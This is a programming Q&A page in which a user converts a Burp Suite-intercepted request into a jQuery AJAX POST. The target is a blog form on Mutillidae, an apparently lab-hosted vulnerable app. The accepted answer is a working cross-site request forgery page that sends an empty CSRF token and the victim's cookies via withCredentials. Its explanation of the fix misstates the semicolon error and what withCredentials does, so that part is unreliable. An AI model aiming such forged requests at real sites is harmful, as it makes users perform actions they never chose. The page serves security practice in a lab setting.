Search code examples
javascriptajaxpostcsrfburp

Sending POST request with AJAX which is intercepted by Burp Suite

I intercepted a POST request with Burp Suite and I want to send this request manually from JavaScript Ajax call.

This is my request's raw: Burp Suite - Raw Post Request

I tried to send POST request like that:

<!DOCTYPE html>
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script>
$.ajax({
    type: 'POST',
    url: 'http://10.10.20.103/mutillidae/index.php?page=add-to-your-blog.php',
    data: {
        'csrf-token': '',
        'blog_entry': 'post from ajax',
        'add-to-your-blog-php-submit-button': 'Save+Blog+Entry'
    };
});
</script>
</head>
<body>
</body>
</html>

But I couldn't manage it. Where is my mistake? Or, how should I do this? How could I convert raw request to Ajax request?

Thanks!

Solution

  • The correct solution is:

    <!DOCTYPE html>
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script>
$.ajax({
    method: 'POST',
    url: 'http://10.10.20.103/mutillidae/index.php?page=add-to-your-blog.php',
    data: {
        'csrf-token': '',
        'blog_entry': 'post from ajax',
        'add-to-your-blog-php-submit-button': 'Save+Blog+Entry'
    },
    xhrFields: {
       withCredentials: true
    }
});
</script>
</head>
<body>
</body>
</html>

    I forgot a semicolon at the end of the data field's closing curly brace. An addition, I must add xhrFields field for bypassing cookie needing.